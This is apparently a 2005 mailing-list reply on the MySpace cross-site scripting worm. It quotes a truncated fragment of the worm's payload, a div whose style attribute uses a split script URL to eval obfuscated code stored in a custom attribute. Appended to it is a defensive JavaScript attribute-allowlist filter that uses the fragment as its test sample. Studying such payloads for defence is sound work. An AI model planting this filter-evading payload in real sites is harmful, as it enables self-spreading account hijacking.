I don't think myspace.com's related problem has anything to do with <cfqueryparam>... I think this is bad coding, that's all...
Here's a piece of the self-propagating cross-site scripting (XSS) worm code <http://www.betanews.com/article/CrossSite_Scripting_Worm_Hits_MySpace/1129232391>:

<div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}} .................

taken from http://namb.la/popular/tech.html

Rizal
masrizal.com

At 12:52 PM 18/10/2005, you wrote:
>Can we Readers-Digest this saga and spill to the masses that these
>guys can't spell cfqueryparam? just curious as I'm not inclined to
>read this saga unless someone can show me a reason for same. Not so
>much a smart opinion as a late nite one... tired and not ready to give
>credence to a new threat that sounds like old news.
>
>--
>--mattRobertson--
>Janitor, MSB Web Systems
>mysecretbase.com
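
Added example, not part of the original post or of any site's code: cfqueryparam binds SQL parameters and stores submitted markup unchanged, so a fragment like the one quoted above has to be handled by an HTML attribute filter. The sketch below is one allowlist-style filter; all function and constant names are hypothetical, and the sample input is constructed from the attributes shown in the post.

```javascript
// Added example: allowlist filter for attributes of user-submitted HTML.
// All names are hypothetical; the sample input is constructed from the post.
const ALLOWED_ATTRS = new Set(["id", "class", "title", "style"]);

// Undo what a browser tolerates inside CSS before the value is inspected:
// comments, backslash escapes, whitespace and control characters.
function normalizeCss(value) {
  return value
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/\\([0-9a-f]{1,6})\s?/gi, (_, hex) => {
      const cp = parseInt(hex, 16);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "";
    })
    .replace(/\\/g, "")
    .replace(/[\s\u0000-\u001f]+/g, "")
    .toLowerCase();
}

// A style value is accepted only if it has no script-capable construct
// and every url(...) points at http(s). Anything else is rejected.
function cssValueIsSafe(value) {
  const css = normalizeCss(value);
  if (/expression\(|behavior:|-moz-binding|@import/.test(css)) return false;
  return css.split("url(").slice(1)
    .every((rest) => /^["']?https?:\/\//.test(rest));
}

// Keep allowlisted attributes only; unknown ones (expr, on*) are dropped,
// and style is dropped when its value fails the CSS check.
function filterAttributes(attrs) {
  const kept = {};
  for (const [name, value] of Object.entries(attrs)) {
    const key = name.toLowerCase();
    if (!ALLOWED_ATTRS.has(key)) continue;
    if (key === "style" && !cssValueIsSafe(value)) continue;
    kept[key] = value;
  }
  return kept;
}

// Constructed sample: the attributes of the <div> quoted in the post
// (the expr body is elided here, as it is in the post).
const WORM_DIV = {
  id: "mycode",
  style: "BACKGROUND: url('java script:eval(document.all.mycode.expr)')",
  expr: "var B=String.fromCharCode(34); ...",
};
console.log(filterAttributes(WORM_DIV)); // only the id attribute survives
```

The normalization step is what catches the split scheme name in the quoted style attribute: a filter that searches the raw value for the unbroken scheme string never matches it.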

